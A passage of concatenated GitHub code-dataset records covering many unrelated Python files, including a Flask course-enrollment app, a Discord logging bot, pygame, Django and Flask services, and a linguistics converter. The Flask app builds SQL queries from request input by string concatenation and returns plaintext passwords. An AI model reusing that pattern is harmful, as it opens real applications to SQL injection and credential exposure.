print('validated')\n answer_match = True\n # reset password when user exists and security answers validated\n cursor.execute(\"UPDATE users SET password = '\"+pwd+\"' WHERE username = '\"+username+\"';\")\n connect.commit()\n\n\n response_body = {\n 'user_exists': user_exists,\n 'answer_match': 
answer_match,\n        'new_password': cursor.execute(\"SELECT password from users where username = '\"+username+\"';\").fetchone()[0]\n    }\n\n    return json.dumps(response_body)\n\n@app.route('/enrollment', methods=['POST'])\ndef enroll():\n    req = json.loads(request.data)\n    user_id = req['user_id']\n    course_to_add = req['course_to_add']\n\n    user = cursor.execute(\"SELECT * FROM users WHERE user_id = {0};\".format(user_id)).fetchall()[0]\n    role = user[6]\n    course = cursor.execute(\"SELECT * FROM courses WHERE course_id = {0};\".format(course_to_add)).fetchall()[0]\n    if role == \"teacher\":\n        if course[2] != None:\n            msg = course[1] + \" already has an instructor\"\n        else:\n            cursor.execute(\"UPDATE courses SET instructor_id = {0} WHERE course_id = {1};\".format(user_id, course_to_add))\n            connect.commit()\n            msg = user[3] + \" is now the instructor of \" + course[1]\n    else:\n        enrollment = cursor.execute(\"SELECT * FROM enrollments WHERE user_id = {0} AND course_id = {1};\".format(user_id, course_to_add)).fetchall()\n        if len(enrollment) > 0:\n            msg = user[3] + \" is already enrolled in \" + course[1]\n        else:\n            numOfEnrollments = len(cursor.execute(\"SELECT * FROM enrollments;\").fetchall())\n            numOfStudentAssignment = len(cursor.execute(\"SELECT * FROM student_assignment;\").fetchall())\n            cursor.execute(\"INSERT INTO enrollments VALUES ({0}, {1}, {2});\".format(numOfEnrollments+1, user_id, course_to_add))\n            connect.commit()\n            assignments = cursor.execute(\"SELECT * FROM assignments WHERE course_id = {0};\".format(course_to_add)).fetchall()\n            for a in assignments:\n                numOfStudentAssignment += 1\n                cursor.execute(\"INSERT INTO student_assignment VALUES ({0}, {1}, {2}, NULL, NULL);\".format(numOfStudentAssignment, user_id, a[0]))\n                connect.commit()\n            msg = user[3] + \" is now enrolled in \" + course[1]\n\n    response_body = {\n        \"message\": msg\n    }\n    return json.dumps(response_body)\n\n","repo_name":"chrisxx97/Canvas-Project","sub_path":"canvas/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26807894865","text":"import logging\nfrom datetime import timedelta\n\nfrom discord import Embed, Message, TextChannel\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot\n\nfrom ..cog import Cog\nfrom ..config import config\n\n\nlogger = logging.getLogger(__name__)\n\n\nasync def setup(bot: Bot) -> None:\n    await bot.add_cog(MessageLogging(bot))\n\n\nasync def teardown(bot: Bot) -> None:\n    await bot.remove_cog(\"MessageLogging\")\n\n\nclass MessageLogging(Cog):\n    def __init__(self, bot: Bot) -> None:\n        super().__init__(bot, logger)\n\n    async def run_once_when_ready(self) -> None:\n        self.channel: TextChannel = await self.bot.fetch_channel(config.channels.text.conversation)\n        return await super().run_once_when_ready()\n\n    @commands.Cog.listener(\"on_message\")\n    async def on_message(self, message: Message) -> None:\n        if message.author.bot or message.channel.id == config.channels.text.conversation:\n            return\n\n        date = (message.created_at + timedelta(hours=9)).strftime(\"%s\")\n        description = f\"Date: <t:{date}>\\n\"\n        description += f\"Name: `{message.author}`\\n\"\n        description += f\"Channel: {message.channel.mention} (`{message.channel.id}`)\\n\"\n        description += f\"URL: {message.jump_url}\\n\"\n        description += f\"Content: `{message.content}`\\n\"\n\n        embed = Embed(color=message.author.color, description=description)\n        name = 
f\"{message.author.display_name}({message.author.id})\"\n embed.set_author(name=name, icon_url=message.author.avatar.url)\n await self.channel.send(embed=embed)\n\n return\n","repo_name":"ster-phys/bot_cps","sub_path":"apps/mailot/conversation.py","file_name":"conversation.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"42767261365","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 16 14:20:41 2019\r\n\r\n@author: Charles\r\n\"\"\"\r\n\r\nimport pygame\r\nfrom pygame.sprite import Sprite\r\n\r\n\r\nclass Bullet(Sprite):\r\n '''class to manage bullets fires from the ship'''\r\n \r\n def __init__(self, ai_settings, screen, rocket):\r\n '''create a bullet object at the ships current location'''\r\n super().__init__()\r\n self.screen = screen\r\n \r\n #creat a bullet rectAT (0, 0) and the set the correct position\r\n self.rect = pygame.Rect(0, 0, int(ai_settings.bullet_width),\r\n int(ai_settings.bullet_height))\r\n self.rect.centerx = rocket.rect.centerx\r\n self.rect.top = rocket.rect.top\r\n \r\n #store the bullet's position as a decimmal value\r\n \r\n self.y = float(self.rect.y)\r\n \r\n self.color = ai_settings.bullet_color\r\n self.speed_factor = ai_settings.bullet_speed_factor\r\n\r\n def update(self):\r\n '''move the bullet up the screen'''\r\n #update the decimal positon of the bullet\r\n self.y -= self.speed_factor\r\n #update the rect position\r\n self.rect.y = self.y\r\n \r\n def draw_bullet(self):\r\n '''draw bullet to the screen'''\r\n pygame.draw.rect(self.screen, self.color, self.rect)","repo_name":"CharlesGaskins/games","sub_path":"alien_invasion/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31452868417","text":"from django.urls import path\nfrom . 
import views as v\n\napp_name = 'glosowania'\n\nurlpatterns = (\n    path('status/<int:pk>/', v.status, name='status'),\n    # http://127.0.0.1:8000/glosowania/details/89/\n    path('details/<int:pk>/', v.details, name='details'),\n    path('edit/<int:pk>/', v.edit, name='edit'),\n    path('nowy/', v.dodaj, name='dodaj_nowy'),\n)\n","repo_name":"soma115/wikikracja","sub_path":"glosowania/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"16708849207","text":"import sys\nimport random\n\n\n# @include\nclass Interval:\n\n    def __init__(self, left=0, right=0):\n        self.left = left\n        self.right = right\n# @exclude\n\n    def __eq__(self, other):\n        return self.left == other.left and self.right == other.right\n\n    def __repr__(self):\n        return '(%s, %s)' % (self.left, self.right)\n\n    def __hash__(self):\n        return self.left ^ self.right\n\n\n# @include\n\n\nclass EndPoint:\n\n    def __init__(self, interval, is_left):\n        self.ptr = interval\n        self.is_left = is_left\n\n    def __lt__(self, other):\n        a = self.ptr.left if self.is_left else self.ptr.right\n        b = other.ptr.left if other.is_left else other.ptr.right\n        return a < b or (a == b and self.is_left and not other.is_left)\n# @exclude\n\n    def __repr__(self):\n        return '%s: (%s, %s)' % (\n            ('Right', 'Left')[self.is_left], self.ptr.left, self.ptr.right)\n\n\n# @include\ndef find_minimum_visits(intervals):\n    endpoints = []\n    for i in intervals:\n        endpoints.append(EndPoint(i, True))\n        endpoints.append(EndPoint(i, False))\n    endpoints.sort()\n\n    def find_minimum_visits_helper(endpoints):\n        S = []  # A minimum set of visit times.\n        covered = set()\n        covering = []\n        for e in endpoints:\n            if e.is_left:\n                covering.append(e.ptr)\n            elif e.ptr not in covered:\n                # e's interval has not been covered.\n                S.append(e.ptr.right)\n                # Adds all intervals in covering to covered.\n                covered.update(covering)\n                covering.clear()  # e is contained in all intervals in covering.\n        return S\n    return find_minimum_visits_helper(endpoints)\n# @exclude\n\n\n# O(n^2) checking solution\ndef check_ans(intervals, ans):\n    is_visited = [False] * len(intervals)\n    for a in ans:\n        for i, interval in enumerate(intervals):\n            if interval.left <= a <= interval.right:\n                is_visited[i] = True\n    assert all(is_visited)\n\n\ndef simple_test():\n    intervals = [\n        Interval(1, 4), Interval(2, 8), Interval(3, 6), Interval(3, 5),\n        Interval(7, 10), Interval(9, 11)\n    ]\n    ans = find_minimum_visits(intervals)\n    assert ans == [4, 10]\n    intervals = [\n        Interval(1, 2), Interval(2, 3), Interval(3, 4), Interval(4, 5),\n        Interval(5, 6), Interval(6, 7)\n    ]\n    ans = find_minimum_visits(intervals)\n    assert ans == [2, 4, 6]\n\n\ndef main():\n    simple_test()\n    for times in range(1000):\n        print('Test', times)\n        n = int(sys.argv[1]) if len(sys.argv) == 2 else random.randint(1, 10000)\n        A = []\n        for i in range(n):\n            left = random.randrange(10000)\n            right = random.randint(left, left + 100)\n            A.append(Interval(left, right))\n        ans = find_minimum_visits(A)\n        check_ans(A, ans)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"epibook/epibook.github.io","sub_path":"solutions/python/points_covering_intervals_alternative.py","file_name":"points_covering_intervals_alternative.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":338,"dataset":"github-code","pt":"2"} +{"seq_id":"34944701014","text":"from flask import Flask, jsonify, request\nimport requests\n\nfrom order_service.model import 
*\n\n\nauth_broker_url = 'http://127.0.0.1:9999/auth'\norder_app = Flask(__name__)\n\n\n@order_app.before_request\ndef _db_connect():\n    if db.is_closed():\n        db.connect()\n\n\n@order_app.teardown_request\ndef _db_close(exc):\n    if not db.is_closed():\n        db.close()\n\n\n@order_app.route('/', methods=['GET'])\ndef get_order():\n    response = requests.get(auth_broker_url, headers=request.headers).json()\n    if response.get('error'):\n        return jsonify({\n            'error': 'Invalid Auth'\n        })\n\n    orders = Order.select().where(Order.cust_id == response.get('id'))\n\n    data = [order.serialize() for order in orders]\n\n    return jsonify(data)\n\n\n@order_app.route('/<unique_id>', methods=['GET'])\ndef get_order_by_unique_id(unique_id):\n    order = Order.get_or_none(Order.unique_id == unique_id)\n\n    if order is None:\n        return jsonify({\n            'error' : 'Order not found'\n        })\n    return jsonify(order.serialize())\n\n\n@order_app.route('/', methods=['POST'])\ndef create_order():\n    if len(request.json.get('items')) == 0:\n        return jsonify({\n            'error': 'You must specify at least 1 item'\n        })\n\n    response = requests.get(auth_broker_url, headers=request.headers).json()\n    if response.get('error'):\n        return jsonify({\n            'error': 'Invalid Auth'\n        })\n\n    order = Order(\n        cust_id=response.get('id'),\n        emp_id=request.json.get('emp_id'),\n        from_lat=request.json.get('from_lat'),\n        from_lng=request.json.get('from_lng'),\n        additional_detail=request.json.get('additional_detail')\n    )\n\n    try:\n        order.save()\n    except Exception as e:\n        print(e)\n        return jsonify({\n            'error': 'Missing one or more field'\n        })\n\n    for item in request.json.get('items'):\n        order_point = OrderPoint(\n            order=order,\n            receiver_name=item['receiver_name'],\n            to_lat=item['to_lat'],\n            to_lng=item['to_lng'],\n            weight=item['weight']\n        )\n\n        order_point.save()\n\n    data = {**order.serialize()}\n\n    return jsonify(data)","repo_name":"ilhamfp/multisend","sub_path":"order_service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22681351384","text":"import unittest\nimport collections\nfrom unittest.case import TestCase\n\nclass CollectionSimpleTest(unittest.TestCase):\n\n    def test_counter(self):\n        s = \"One two three, one two TREE.\"\n        sx = s.translate(str.maketrans(\"\", \"\", \",.\")).lower().split()\n        a = collections.Counter(sx)\n        print(a.most_common())\n\n\n    def test_deaultdict(self):\n        di = collections.defaultdict(int)\n        print(di)\n        self.assertEquals(di[\"9\"], 0)\n\n        dd = collections.defaultdict(list)\n        print(dd[1])\n        self.assertListEqual(dd[1], [])","repo_name":"lostsquirrel/python_test","sub_path":"library-demos/collections_test/simple_test.py","file_name":"simple_test.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40932183539","text":"\nimport math\nimport vs\n\n#import ctypes\n\n# This is a routine which takes input from a running vehicle and\n# creates a new path to avoid the detected obstruction.\n#vs_outvals = []\ndef steer (signal, intab):\n\n    # No Inputs\n    num = len(intab)\n    if (num != 0):\n        return -1.0\n\n\n    ROAD_ID = vs.var(\"ROAD_PATH_ID\").value()\n    LForward = vs.var(\"L_FORWARD\").value()\n    XCG_TM = vs.getval(\"XCG_TM\")\n    YCG_TM = vs.var(\"YCG_TM\").value()\n\n    Yaw = vs.var(\"YAW\").value()\n\n    Xpreview = XCG_TM + LForward*math.cos(Yaw)\n    Ypreview = YCG_TM + LForward*math.sin(Yaw)\n\n    RoadL = vs.road_l_id(Xpreview, Ypreview, ROAD_ID, 1)\n\n    
LatTrack = vs.getval(\"LAT_TRACK\")\n GainStr = vs.getval(\"GAIN_STEER_CTRL\")\n\n if (signal == \"OPEN\"):\n steer = (LatTrack - RoadL)*GainStr\n\n\n vs.outvals = []\n\n vs.outvals.append(steer)\n vs.outvals.append(Xpreview)\n vs.outvals.append(Ypreview)\n return 0.0\n\ndef steer_param (signal, intab):\n\n # No Inputs\n num = len(intab)\n if (num != 0):\n return -1.0\n\n\n ROAD_ID = vs.var(\"ROAD_PATH_ID\").value()\n LForwardVar = vs.var(\"L_FORWARD\")\n\n LForward = LForwardVar.value()\n\n #Example on how to examine validity of value\n if (LForwardVar.ident() == -1):\n vs.print(LForwardVar.name())\n vs.print(\"Value not found\")\n return -1.0\n\n XCG_TM = vs.getval(\"XCG_TM\")\n YCG_TM = vs.var(\"YCG_TM\").value()\n\n Yaw = vs.var(\"YAW\").value()\n\n Xpreview = XCG_TM + LForward*math.cos(Yaw)\n Ypreview = YCG_TM + LForward*math.sin(Yaw)\n\n RoadL = vs.road_l_id(Xpreview, Ypreview, ROAD_ID, 1)\n RoadPres = vs.road_l_id(XCG_TM, YCG_TM, ROAD_ID, 1)\n\n LatTrack = vs.getval(\"LAT_TRACK\")\n GainStr = vs.getval(\"GAIN_STEER_CTRL\")\n\n if (signal == \"OPEN\"):\n steer = (LatTrack - RoadL)*GainStr\n\n LatError = (LatTrack - RoadPres)\n\n vs.var(\"LERROR\").setvalue(LatError)\n\n LatError = abs(LatError)\n\n toterr = vs.getval(\"TOTERR\")\n\n vs.var(\"TOTERR\").setvalue(toterr+LatError)\n\n\n\n vs.outvals = []\n\n vs.outvals.append(steer)\n vs.outvals.append(Xpreview)\n vs.outvals.append(Ypreview)\n return 0.0\n\ndef update_tab (signal, intab):\n\n # No Inputs\n num = len(intab)\n if (num != 0):\n return -1.0\n\n Iters = vs.var(\"ITERS\").value()\n Iters = int(Iters)\n Toterr = vs.var(\"TOTERR\").value()\n\n vs.tab(\"LFWD_ES\").entry(0, Iters, 1).setvalue(Toterr)\n\n vs.outvals = []\n\n return 0.0\n\n\ndef bestval_lfwd (signal, intab):\n\n # No Inputs\n num = len(intab)\n if (num != 0):\n return -1.0\n\n Niters = vs.var(\"NITERS\").value()\n Printvals = vs.var(\"PRINTVALS\").value()\n\n bestval = vs.tab(\"LFWD_OPTS\").entry(0, 1, 1).value()\n besterr = vs.tab(\"LFWD_ES\").entry(0, 1, 1).value()\n\n Niters = int(Niters)\n\n if (Printvals == 1):\n vs.print(\"L_FORWARD parameter examined.\")\n for ival in range(1,Niters+1):\n newerr = vs.tab(\"LFWD_ES\").entry(0, ival, 1).value()\n entrystr = \"Index: \"+str(ival)+\" Entry: \"+str(vs.tab(\"LFWD_OPTS\").entry(0, ival, 1).value())+\" Value: \"+str(round(vs.tab(\"LFWD_ES\").entry(0, ival, 1).value(),4))\n if (Printvals == 1):\n vs.print(entrystr)\n if (newerr < besterr):\n besterr = newerr\n bestval = vs.tab(\"LFWD_OPTS\").entry(0, ival, 1).value()\n\n if (Printvals == 1):\n vs.print(\"Best parameter value is:\")\n vs.print(str(bestval))\n vs.print(\"Error Sum for this value is:\")\n vs.print(str(round(besterr,4)))\n\n vs.var(\"BESTVAL\").setvalue(bestval)\n vs.var(\"BESTVALERROR\").setvalue(besterr)\n\n\n vs.outvals = []\n\n return 0.0\n\n","repo_name":"Theyearling/About_Apollo","sub_path":"CarSimData/Extensions/Python/steercontrol.py","file_name":"steercontrol.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27895421341","text":"#!/usr/bin/env python3\n\nimport os\n\nimport itertools\n\nimport codecs\nimport glob\nfrom lingpy import ipa2tokens, tokens2class\n\n\ndef read_ipa_to_asjp(\n filename=os.path.join(os.path.dirname(__file__), \"../data\",\n \"ipa2asjp.txt\")):\n \"\"\"Read a SSV mapping IPA symbols to ASJP classes.\"\"\"\n ipa_to_asjp = {}\n\n f = codecs.open(filename, \"r\", encoding=\"utf-8\")\n\n for line in f:\n line = 
line.replace(\"\\n\", \"\")\n line = line.replace(\"\\r\", \"\")\n ipa, asjp = line.split(\" \")\n ipa_to_asjp[ipa] = asjp\n f.close()\n return ipa_to_asjp\n\n\nipa_to_asjp = read_ipa_to_asjp()\n\n\ndef tokenize_word_reversibly(ipa):\n \"\"\"Reversibly convert an IPA string into a list of tokens.\n\n In contrast to LingPy's tokenize_word, do this without removing\n symbols. This means that the original IPA string can be recovered\n from the tokens.\n\n \"\"\"\n tokenized_word = ipa2tokens(\n ipa, merge_vowels=False, merge_geminates=False)\n token = 0\n index = 0\n for i in ipa:\n try:\n tokenized_word[token][index]\n except IndexError:\n token += 1\n index = 0\n try:\n if i != tokenized_word[token][index]:\n if index == 0:\n tokenized_word.insert(token, i)\n else:\n tokenized_word[token] = (\n tokenized_word[token][:index] +\n i +\n tokenized_word[token][index:])\n except IndexError:\n tokenized_word.append(i)\n index += 1\n assert ''.join(tokenized_word) == ipa\n return tokenized_word\n\n\ndef ipa2asjp(ipa):\n \"\"\"Convert an IPA string into a ASJP token string.\n\n This function tries to preserve the len of the token string.\n\n \"\"\"\n asjp_list = [t for x in tokenize_word_reversibly(ipa)\n for t, char in itertools.zip_longest(\n tokens2class(x, 'asjp'),\n \"0\")]\n assert len(''.join(asjp_list)) == len(ipa)\n return ''.join(asjp_list)\n\n\ndef ipa2sca(ipa):\n \"\"\"Convert an IPA string into a SCA token string.\n\n This function tries to preserve the len of the token string.\n\n \"\"\"\n sca_list = [t for x in tokenize_word_reversibly(ipa)\n for t, char in itertools.zip_longest(\n tokens2class(x, 'sca'),\n \"0\")]\n assert len(''.join(sca_list)) == len(ipa)\n return ''.join(sca_list)\n\n\ndef read_convert_ipa_asjp():\n \"\"\"Convert IPA IELex files to ASJP.\"\"\"\n f_trace = codecs.open(\"test_ipa2asjp.txt\", \"w\", encoding=\"utf-8\")\n for file_name in glob.iglob(\"data/*tsv\"):\n f_trace.write(file_name+\"\\n\")\n f = codecs.open(file_name, \"r\", encoding=\"utf-8\")\n fout = codecs.open(file_name+\".asjp\", \"w\", encoding=\"utf-8\")\n header = f.readline()\n fout.write(header)\n header = header.split(\"\\t\")\n for line in f:\n arr = line.split(\"\\t\")\n arr[5] = ipa2asjp(arr[5])\n fout.write(\n \"\\t\".join(arr))\n f.close()\n fout.close()\n f_trace.close()\n\n\n\nif __name__ == \"__main__\":\n read_convert_ipa_asjp()\n","repo_name":"PhyloStar/CogDetect","sub_path":"infomapcog/ipa2asjp.py","file_name":"ipa2asjp.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"31002040473","text":"#!/usr/bin/env python3\n\nimport pprint\n\nouter_list = []\nfh = open('../python_data/student_db.txt')\nlines = fh.readlines()[1:]\n\nfor line in lines:\n id, street, city, state, zip = line.split(':')\n inner_list = [id, city, state]\n outer_list.append(inner_list)\n\nprint(outer_list[0][1])\n","repo_name":"MyloTuT/IntroToPython","sub_path":"Excercise/Ex7/ex7.13.py","file_name":"ex7.13.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"39723483232","text":"from django.shortcuts import render\nfrom django.contrib.auth import authenticate, logout\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import authentication, permissions,status\nfrom .serializers import 
MyTokenObtainPairSerializer, ProjectsSerializer, UniversitiesSerializer, MilestonesSerializer,\tLoginSerializer, CompanySerializer, CollaborationsSerializer\n\nfrom accounts.models import User\nfrom project.models import Project, Milestones\nfrom company.models import Company\nfrom university.models import University\n# Create your views here.\n\nclass LoginView(TokenObtainPairView):\t\n\tserializer_class = MyTokenObtainPairSerializer\n\nclass Login(APIView):\n\tauthentication_classes = []\n\tpermission_classes = []\n\n\tdef post(self, request, *args, **kwargs):\n\t\temail = request.data.get(\"email\")\n\t\tpassword = request.data.get(\"password\")\n\t\tuser = authenticate(email=email, password=password)\n\t\tif user and user.user_type == 2:\n\t\t\tdata = {\n\t\t\t\t\"message\": \"Validated\",\n\t\t\t\t\"user_id\": user.pk,\n\t\t\t\t'status': status.HTTP_200_OK\n\t\t\t}\n\t\t\treturn Response(data, status=status.HTTP_200_OK)\n\t\telse:\n\t\t\tdata = {\n\t\t\t\t\"message\": \"Invalid email or password\",\n\t\t\t\t'status': status.HTTP_401_UNAUTHORIZED\n\t\t\t}\n\t\t\treturn Response(data, status=status.HTTP_401_UNAUTHORIZED)\n\nclass PersonalDetails(APIView):\n\tauthentication_classes = []\n\tpermission_classes = []\n\n\tdef post(self, request, *args, **kwargs):\n\t\tuser_id = request.data.get(\"user_id\")\n\t\tcompany = Company.objects.filter(admin=user_id)\n\t\tjson_object = CompanySerializer(company, many=True).data\n\t\treturn Response(json_object)\n\nclass Projects(APIView):\n\tauthentication_classes = []\n\tpermission_classes = []\n\n\tdef post(self, request, *args, **kwargs):\n\t\tuser_id = request.data.get(\"user_id\")\n\t\tuser = User.objects.filter(pk=user_id).first()\n\t\tif user:\n\t\t\tcompany = Company.objects.filter(admin=user.pk).first()\n\t\t\tprojects = Project.objects.filter(\n\t\t\t\tdeveloped_for=company,\n\t\t\t\tis_deleted=False, \n\t\t\t\tdeveloped_by__isnull=False\n\t\t\t).order_by(\"-created_at\")\n\t\t\tjson_object = ProjectsSerializer(projects, many=True).data\n\t\t\treturn Response(json_object, status=status.HTTP_200_OK)\n\t\telse:\n\t\t\tdata = {\n\t\t\t\t\"error\": \"Invalid User ID\",\n\t\t\t\t'status': 401\n\t\t\t}\n\t\t\treturn Response(data, status=status.HTTP_401_UNAUTHORIZED)\n\nclass GetCollaborations(APIView):\n\tauthentication_classes = []\n\tpermission_classes = []\n\n\tdef post(self, request, *args, **kwargs):\n\t\tuser_id = request.data.get(\"user_id\")\n\t\tuser = User.objects.filter(pk=user_id).first()\n\t\tif user:\n\t\t\tcompany = Company.objects.filter(admin=user.pk).first()\n\t\t\tprojects = Project.objects.filter(\n\t\t\t\tdeveloped_for=company,\n\t\t\t\tis_deleted=False, \n\t\t\t\tdeveloped_by__isnull=False\n\t\t\t).order_by(\"-created_at\")\n\t\t\tjson_object = CollaborationsSerializer(projects, many=True).data\n\t\t\treturn Response(json_object, status=status.HTTP_200_OK)\n\t\telse:\n\t\t\tdata = {\n\t\t\t\t\"error\": \"Invalid User ID\",\n\t\t\t\t'status': 401\n\t\t\t}\n\t\t\treturn Response(data, status=status.HTTP_401_UNAUTHORIZED)\n\nclass Universities(APIView):\n\tauthentication_classes = []\n\tpermission_classes = []\n\n\tdef get(self, request, *args, **kwargs):\n\t\tuniversities = University.objects.all().order_by(\"ranking\")\n\t\tjson_object = UniversitiesSerializer(universities, many=True).data\n\t\treturn Response(json_object, status=status.HTTP_200_OK)\n\nclass GetMilestones(APIView):\n\tauthentication_classes = []\n\tpermission_classes = []\n\n\tdef post(self, request, *args, **kwargs):\n\t\tproject_id = 
request.data.get(\"project_id\")\n\t\tmilestones = Milestones.objects.filter(project=project_id).order_by(\"created_at\")\n\t\tjson_object = MilestonesSerializer(milestones, many=True).data\n\t\treturn Response(json_object, status=status.HTTP_200_OK)","repo_name":"murtahil/Career-Bridge-master","sub_path":"Career-Bridge-master/apis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9706617991","text":"from zipfile import ZipFile\nimport os\nfrom os.path import basename\n\nclass ComalaZipcode():\n\n def __init__(self, zipname, pathtozip):\n with ZipFile(zipname, 'w') as zipObj:\n for folderName, subfolders, filenames in os.walk(pathtozip):\n for filename in filenames:\n filePath = os.path.join(folderName, filename)\n zipObj.write(filePath, basename(filePath))\n","repo_name":"Krakoslabs/lambda-node","sub_path":"cdk/python/comala_classes/zipcode.py","file_name":"zipcode.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17750925625","text":"from unittest import TestCase\nfrom src.two_heaps import (\n MedianOfAStream,\n SlidingWindowMedian,\n SlidingWindowMedianSol\n)\n\n\nclass TestTwoHeaps(TestCase):\n\n def test_median_of_a_stream(self):\n stream = MedianOfAStream()\n\n stream.insert_num(3)\n stream.insert_num(1)\n self.assertEqual(stream.find_median(), 2)\n\n stream.insert_num(5)\n self.assertEqual(stream.find_median(), 3)\n\n stream.insert_num(4)\n self.assertEqual(stream.find_median(), 3.5)\n\n def test_sliding_window_median(self):\n stream = SlidingWindowMedianSol()\n\n result = stream.find_sliding_window_median([1, 2, -1, 3, 5], 2)\n self.assertEqual(result, [1.5, 0.5, 1.0, 4.0])\n\n result = stream.find_sliding_window_median([1, 2, -1, 3, 5], 3)\n self.assertEqual(result, [1.0, 2.0, 3.0])\n","repo_name":"mzperezous/grokking-the-coding-interview","sub_path":"python/tests/test_two_heaps.py","file_name":"test_two_heaps.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36515496838","text":"from category import Category\r\nimport json\r\n\r\n# This module cList.py contains class cList (category list)\r\n\r\nclass cList:\r\n def __init__(self): # constructor (all specific categories in the program are defined here\r\n self.cl = list()\r\n #self.catFileReadable = False\r\n #try:\r\n # self.readCatFile()\r\n # self.catFileReadable = True\r\n #except IOError:\r\n self.addCat('Cooling load')\r\n self.addMembertoCat('Cooling load', 'Chillers load (kWh)') # remove from sum\r\n self.addMembertoCat('Cooling load', 'Ap Sys chillers load (kWh)')\r\n self.addMembertoCat('Cooling load', 'ApHVAC chillers load (kWh)')\r\n self.addMembertoCat('Cooling load', 'ApHVAC DX cooling systems load (kWh)') # remove from sum\r\n self.addCat('Chiller energy')\r\n self.addMembertoCat('Chiller energy', 'ApHVAC chillers energy (kWh)')\r\n self.addMembertoCat('Chiller energy', 'ApHVAC DX cooling systems energy (kWh)') #removed\r\n self.addMembertoCat('Chiller energy', 'ApHVAC distr pumps energy (kWh)')\r\n self.addMembertoCat('Chiller energy', 'ApHVAC heat rej fans/pumps energy (kWh)')\r\n self.addCat('Building energy')\r\n #self.addMembertoCat('Building energy', 'ApHVAC DX cooling systems energy (kWh)') # remove from sum\r\n self.addMembertoCat('Building energy', 'ApHVAC distr fans 
energy (kWh)')\r\n self.addMembertoCat('Building energy', 'Lights Misc. A (kWh)')\r\n self.addMembertoCat('Building energy', 'Equip Misc. H (kWh)')\r\n self.addMembertoCat('Building energy', 'Other Process (kWh)')\r\n self.addMembertoCat('Building energy', 'MEC elevators energy (kWh)')\r\n # self.addCat('Conduction Gain Breakdown')\r\n # self.addMembertoCat('Conduction Gain Breakdown', 'Conduction gain - external walls (kWh)')#add more categories here\r\n # self.addMembertoCat('Conduction Gain Breakdown', 'Solar gain (kWh)')\r\n # self.addMembertoCat('Conduction Gain Breakdown', 'Conduction gain - external windows (kWh)')\r\n # self.addMembertoCat('Conduction Gain Breakdown', 'ApHVAC chillers load (kWh)')\r\n # self.addMembertoCat('Conduction Gain Breakdown', 'Window Cooling Load Conduction Gain (kWh)')\r\n # self.addMembertoCat('Conduction Gain Breakdown', 'Wall Cooling Load Conduction Gain (kWh)')#feature maybe tba for adding categories on UI\r\n self.saveCatFile()\r\n\r\n\r\n def addCat(self, name): # function to append a new category to the list\r\n self.cl.append(Category(name))\r\n\r\n def addMembertoCat(self, name, membername): # function to append a string 'membername' as member of category with name 'name'\r\n for x in range(len(self.cl)):\r\n if self.cl[x].name == name :\r\n self.cl[x].addMembers(membername)\r\n return\r\n\r\n def getMember(self, name):\r\n for cat in self.cl:\r\n if cat.name == name:\r\n return cat.members\r\n\r\n\r\n ## section still in progress\r\n\r\n def addDict(self, dict): # function to import category and its members from a dictionary\r\n self.cl.clear()\r\n for cat in dict:\r\n self.addCat(cat)\r\n for att in dict[cat]:\r\n self.addMembertoCat(cat, att)\r\n\r\n def extractDict(self): # function to extract from list of categories in the program to dictionary\r\n data = {}\r\n for cat in self.cl:\r\n data[cat.name] = cat.members\r\n return data\r\n\r\n def saveCatFile(self, dict = None): # function to save category data to text file\r\n if dict is None:\r\n dict = self.extractDict()\r\n with open('savecat.txt', \"wt\") as fp:\r\n json.dump(dict, fp)\r\n\r\n def readCatFile(self): # function to read a category text file to dictionary for importing to program using addDict()\r\n with open('savecat.txt', \"rt\") as fp:\r\n data = json.load(fp)\r\n self.addDict(data)\r\n #print(\"Data: %s\" % data)\r\n\r\n def resetCatFile(self):\r\n self.cl.clear()\r\n self.addCat('Cooling load')\r\n self.addMembertoCat('Cooling load', 'Chillers load (kWh)') # remove from sum\r\n self.addMembertoCat('Cooling load', 'Ap Sys chillers load (kWh)')\r\n self.addMembertoCat('Cooling load', 'ApHVAC chillers load (kWh)')\r\n self.addMembertoCat('Cooling load', 'ApHVAC DX cooling systems load (kWh)') # remove from sum\r\n self.addCat('Chiller energy')\r\n self.addMembertoCat('Chiller energy', 'ApHVAC chillers energy (kWh)')\r\n self.addMembertoCat('Chiller energy', 'ApHVAC DX cooling systems energy (kWh)') # removed\r\n self.addMembertoCat('Chiller energy', 